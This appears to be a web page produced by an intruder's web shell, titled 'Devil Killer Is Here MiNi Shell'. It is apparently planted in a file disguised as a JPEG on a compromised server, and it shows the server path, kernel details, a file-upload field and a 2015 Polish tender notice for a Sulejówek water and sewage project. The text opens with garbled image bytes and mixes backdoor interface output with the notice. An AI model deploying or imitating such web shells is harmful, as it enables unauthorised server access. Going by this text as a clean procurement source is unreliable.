JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150116/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150116/11274-N-2015.html

<p class="kh_header"><b>Sulejówek: Pełnienie usługi Inżyniera Kontraktu dla Projektu pn. Uporządkowanie gospodarki wodno ściekowej na terenie Miasta Sulejówek</b><br>
<b>Numer ogłoszenia: 11274 - 2015; data zamieszczenia: 16.01.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Sulejówek , ul. Dworcowa 55, 05-070 Sulejówek, woj. mazowieckie, tel. 22 7606230, faks 22 7606213.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sulejowek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie usługi Inżyniera Kontraktu dla Projektu pn. Uporządkowanie gospodarki wodno ściekowej na terenie Miasta Sulejówek.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot niniejszego zamówienia stanowi usługa pełnienia roli Inżyniera Kontraktu dla projektu pn.: Uporządkowanie gospodarki wodno-ściekowej na terenie miasta Sulejówek, a w tym pełnienie usługi nad następującymi robotami:

- budowa Stacji Uzdatniania Wody SUW II w Sulejówku o wydajności 50 m3/h zgodnie z pozwoleniem na budowę,
- opracowanie dokumentacji projektowej wraz z uzyskaniem pozwolenia na budowę oraz budowę sieci kanalizacji sanitarnej o dł. ok. 6 km wraz z budową 4 szt. pompowni ścieków w tym:
Zadanie I
Opracowanie dokumentacji projektowej wraz z uzyskaniem pozwolenia na budowę oraz:
- budowa kanalizacji sanitarnej grawitacyjnej w ul. Żeromskiego, na odcinku od pompowni P1 do ul. Drobiarskiej - kanał sanitarny D0,20 m o długości ok. 0,32 km,
- budowa kanalizacji sanitarnej grawitacyjnej w ul. Drobiarskiej, na odcinku od ul. Żeromskiego do ul. Szklarniowej - kanał sanitarny D0,20 m o długości ok. 0,22 km,
- budowa kanalizacji sanitarnej grawitacyjnej w ul. Szklarniowej, od ul. Drobiarskiej w kierunku zachodnim - kanał sanitarny D0,20 m o długości ok. 0,32 km,
- budowa kanalizacji sanitarnej grawitacyjnej w ul. Rataja - odcinek kanału sanitarnego D0,20 m o długości ok. 0,08 km do ul. Szklarniowej.
Łączna długość kanałów grawitacyjnych D0,20 m dla zadania I - ok. 0,94 km.
- orientacyjna ilość odgałęzień do działek - ok. 65 szt.
- budowa sieciowej pompowni ścieków P1 w ul. Żeromskiego
- budowa przewodu tłocznego Dz110 o długości ok. 0,11 km, od w/w pompowni do istniejącej kanalizacji w ul. Żeromskiego
Zadanie II
Opracowanie dokumentacji projektowej wraz z uzyskaniem pozwolenia na budowę oraz:
- budowa kanalizacji sanitarnej grawitacyjnej w ul. Szklarniowej, na odcinku od działki nr ew. 138 w kierunku pompowni P2 w ul. Szklarniowej - kanał sanitarny D0,20 m o długości ok. 0,28 km wraz z kanałem D0,20 m w drodze wewnętrznej (działka nr ew. 51/8) o długości ok. 0,12 km,
- budowa kanalizacji sanitarnej grawitacyjnej w ul. Szklarniowej, na odcinku od ul. Konwaliowej, w kierunku pompowni P2 w ul. Szklarniowej - kanał sanitarny D0,20 m o długości ok. 0,36 km,
- budowa kanalizacji sanitarnej grawitacyjnej w ul. Konwaliowej - odcinek kanału sanitarnego D0,20 m od ul. Drobiarskiej do ul. Szklarniowej, o długości ok. 0,36 km,
Łączna długość kanałów grawitacyjnych D0,20 m dla zadania II - ok. 1,12 km
- orientacyjna ilość odgałęzień do działek - ok. 40 szt.,
- budowa sieciowej pompowni ścieków P2 w ul. Szklarniowej,
- budowa przewodu tłocznego Dz110 o długości ok. 0,40 km, od w/w pompowni do kanalizacji sanitarnej w ul. Szklarniowej - do odcinka ujętego w zadaniu I.
Na odcinku ok. 0,28 km (w ul. Szklarniowej) kanał grawitacyjny D0,20 m i przewód tłoczny Dz110 od pompowni P2 przebiegać będą równolegle.
Zadanie III
Opracowanie dokumentacji projektowej wraz z uzyskaniem pozwolenia na budowę oraz:
- budowa kanalizacji sanitarnej grawitacyjnej w ul. Drobiarskiej, na odcinku od ul. Konwaliowej w kierunku wschodnim (do działki nr ew. 14/7) - kanał sanitarny D0,20 m o długości ok. 0,26 km,
- budowa kanalizacji sanitarnej grawitacyjnej w ul. Leszczynowej - kanał sanitarny D0,20 m o długości ok. 0,21 km,
- budowa kanalizacji sanitarnej grawitacyjnej w ul. Podleśnej - kanał sanitarny D0,20 m o długości ok. 0,22 km,
- budowa kanalizacji sanitarnej grawitacyjnej w ul. Konwaliowej - kanał sanitarny D0,20 m o długości ok. 0,21 km.
Łączna długość kanałów grawitacyjnych D0,20 m dla zadania III - ok. 0,90 km
- orientacyjna ilość odgałęzień do działek - ok. 35 szt.
- budowa sieciowej pompowni ścieków P3 w ul. Drobiarskiej
- budowa przewodu tłocznego Dz90 o długości ok. 0,13 km, od w/w pompowni do kanalizacji sanitarnej w ul. Konwaliowej - do odcinka ujętego w zadaniu II.
Na odcinku ok. 0,08 km (w ul. Drobiarskiej) kanał grawitacyjny D0,20 m i przewód tłoczny Dz90 od pompowni P3 przebiegać będą równolegle.
Zadanie IV
Opracowanie dokumentacji projektowej wraz z uzyskaniem pozwolenia na budowę oraz:
- budowa kanalizacji sanitarnej grawitacyjnej w ul. Drobiarskiej, odcinek od działki nr ew. 4/38 do ul. Miodowej - kanał sanitarny D0,20 m o długości ok. 0,10 km,
- budowa kanalizacji sanitarnej grawitacyjnej w ul. Miodowej - kanał sanitarny D0,20 m o długości ok. 0,45 km,
- budowa kanalizacji sanitarnej grawitacyjnej w ul. Krzywej - kanał sanitarny D0,20 m o długości ok. 0,25 km,
- budowa kanalizacji sanitarnej grawitacyjnej w ul. Kasztanowej, od ul. Krzywej do ul. Szklarniowej - kanał sanitarny D0,20 m o długości ok. 0,32 km,
- budowa kanalizacji sanitarnej grawitacyjnej w ul. Szklarniowej, od ul. Kasztanowej do ul. Poziomkowej - kanał sanitarny D0,20 m o długości ok. 0,22 km,
Łączna długość kanałów grawitacyjnych D0,20 m dla zadania IV - ok. 1,34 km
- orientacyjna ilość odgałęzień do działek - ok. 80 szt.,
- budowa sieciowej pompowni ścieków P4 w ul. Szklarniowej,
- budowa przewodu tłocznego Dz110 o długości ok. 0,54 km, od w/w pompowni do kanalizacji sanitarnej w ul. Szklarniowej - do odcinka ujętego w zadaniu II.
Na odcinku ok. 0,22 km (w ul. Szklarniowej) kanał grawitacyjny D0,20 m i przewód tłoczny Dz110 od pompowni P4 przebiegać będą równolegle.
Zadanie V
Opracowanie dokumentacji projektowej wraz z uzyskaniem pozwolenia na budowę oraz:
- budowa kanalizacji sanitarnej ciśnieniowej w ul. Rataja - przewód ciśnieniowy Dz90 o długości ok. 0,75 km,
- orientacyjna ilość odgałęzień do działek - ok. 25 szt.,
Łącznie do wykonania w ramach przedmiotowego przedsięwzięcia inwestycyjnego przewidziano:
- ok. 4,30 km kanałów grawitacyjnych D0,20 m,
- ok. 0,88 km przewodów tłocznych i kanalizacji ciśnieniowej Dz90,
- ok. 1,05 km przewodów tłocznych Dz110,
- orientacyjna łączna ilość odgałęzień do działek - ok. 245 szt.,
- 4 pompownie sieciowe,
- 2 pompownie istniejące do przebudowy,
- 4 pompownie sieciowe do remontu,
- modernizacja 6 pompowni ścieków w tym:
- przebudowa pompowni ścieków P14 w ul. Żeromskiego,
- przebudowa pompowni ścieków P19 w ul. Sobieskiego,
- remont pompowni ścieków Pi w ul. Piaskowej,
- remont pompowni ścieków P2 w ul. Idzikowskiego,
- remont pompowni ścieków P8 w ul. Narutowicza,
- remont pompowni ścieków P10 w ul. Mickiewicza,
- modernizacja oczyszczalni ścieków w zakresie wpływającym na obniżenie kosztów eksploatacji (wymiany oświetlenia na LED, kolektory słoneczne).
Szczegółowy opis zadań w PFU.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy Pzp, stanowiących nie więcej niż 50% wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.30.00.00-1, 71.31.00.00-4, 71.31.13.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest zabezpieczyć swą ofertę  wadium w wysokości 6.000,00PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć następujące dokumenty:
a) aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych, oświadczenie w zakresie art. 24 ust.1 pkt 2 ustawy Pzp (zaleca się złożenie oświadczenia zgodnie z wzorem stanowiącym Załącznik 2.2. do IDW (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich),
b) aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich),
c) aktualne zaświadczenie Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego  potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenia , że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich),
d) aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 ustawy Pzp, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich),
e) aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1 pkt 9 ustawy Pzp, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich);
f) listę podmiotów należących do tej samej grupy kapitałowej, o których mowa w art. 24 ust. 2 pkt 5, albo informację o tym, że nie należy do grupy kapitałowej.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi spełniać następujące warunki (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniani oni będą łącznie):
- wykonali w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres działalności jest krótszy - w tym okresie co najmniej 1 usługę polegającą na pełnieniu funkcji Inżyniera Kontraktu przy realizacji projektu inwestycyjnego  odpowiadającego swoim rodzajem przedmiotowi zamówienia o wartości robót budowlanych netto nie mniejszej niż 10.000.000,00 (wartość robót budowlanych)PLN 
W celu potwierdzenia spełniania powyższego warunku Wykonawcy zobowiązani są przedłożyć wykaz wykonanych usług zawierający informacje dotyczące ich wartości, przedmiotu, dat wykonania i odbiorów sporządzony według wzoru stanowiącego załącznik nr 4 do niniejszej IDW wraz z dokumentami  potwierdzającymi, że usługi te zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi spełniać następujące warunki (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniani oni będą łącznie):
Wskazać, do uczestniczenia w wykonaniu niniejszego zamówienia, następujące osoby (Kluczowy Personel) wraz z informacjami na temat ich kwalifikacji zawodowych niezbędnych do wykonania zamówienia, doświadczenia wraz z dokumentami to potwierdzającymi, a także zakres wykonywania przez nich czynności:
-	Inspektor Nadzoru - Inżynier Sanitarny posiadający: uprawnienia budowlane bez ograniczeń w specjalności instalacyjnej w zakresie sieci kanalizacyjnych z minimum 3-letnim doświadczeniem zawodowym o porównywalnym profilu technicznym oraz wpis na listę członków Okręgowej Izby Inżynierów Budownictwa
-	Inspektor Nadzoru  - Inżynier Drogowy posiadający: uprawnienia budowlane bez ograniczeń w specjalności drogowej z minimum 3-letnim doświadczeniem zawodowym o porównywalnym profilu technicznym oraz wpis na listę Okręgowej Izby Inżynierów Budownictwa,
-	Inspektor Nadzoru - Inżynier w branży konstrukcyjnej posiadający: uprawnienia do wykonywania samodzielnych funkcji w budownictwie, do kierowania robotami będącymi przedmiotem zamówienia w branży konstrukcyjno - budowlanej z minimum 3-letnim doświadczeniem zawodowym o porównywalnym profilu technicznym oraz wpis na listę Okręgowej Izby Inżynierów Budownictwa,
-	Inspektor Nadzoru - Inżynier elektryk- automatyk posiadający: uprawnienia budowlane bez ograniczeń w zakresie wykonawstwa robót elektrycznych, z minimum 3-letnim doświadczeniem zawodowym o porównywalnym profilu technicznym oraz wpis na listę członków Okręgowej Izby Inżynierów Budownictwa,
-	Inspektor Nadzoru - technolog - posiadający 3 letnie  doświadczenie zawodowe jako technolog uzdatniania wody, o wydajności stacji nie mniejszej niż Q = 50 m3/h w zakresie redukcji związków żelaza oraz manganu opartej na technologii napowietrzania w zbiorniku kontaktowym i filtracji na filtrach zamkniętych jednostopniowych lub dwustopniowych.
-	Specjalista ds. rozliczeń

Zamawiający dopuszcza możliwość łączenia funkcji wskazanych powyżej, należy złożyć dokumenty potwierdzające kwalifikacje zawodowe. 
W celu potwierdzenia spełniania niniejszego warunku Wykonawcy  zobowiązani są przedłożyć: wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, sporządzony według wzoru stanowiącego załącznik nr 3 do niniejszej IDW.  Jeżeli w wykazie, o którym mowa w poprzednim zdaniu Wykonawca wskazał osoby, którymi będzie dysponował zobowiązany jest również przedłożyć pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie niniejszego zamówienia. W szczególności Wykonawca musi spełniać następujące warunki (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniana będzie ich łączna sytuacja ekonomiczna i finansowa - w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie tego warunku): 
a)	posiadać środki finansowe lub zdolność kredytową w wysokości co najmniej 300.000,00 PLN. 
W celu potwierdzenia spełniania niniejszego warunku Wykonawcy  zobowiązani są przedłożyć informację banku lub spółdzielczej kasy oszczędnościowo kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia. 

b) posiadać polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej. 

W celu potwierdzenia spełniania niniejszego warunku Wykonawca musi złożyć polisę, 
a w przypadku jej braku inny dokument potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

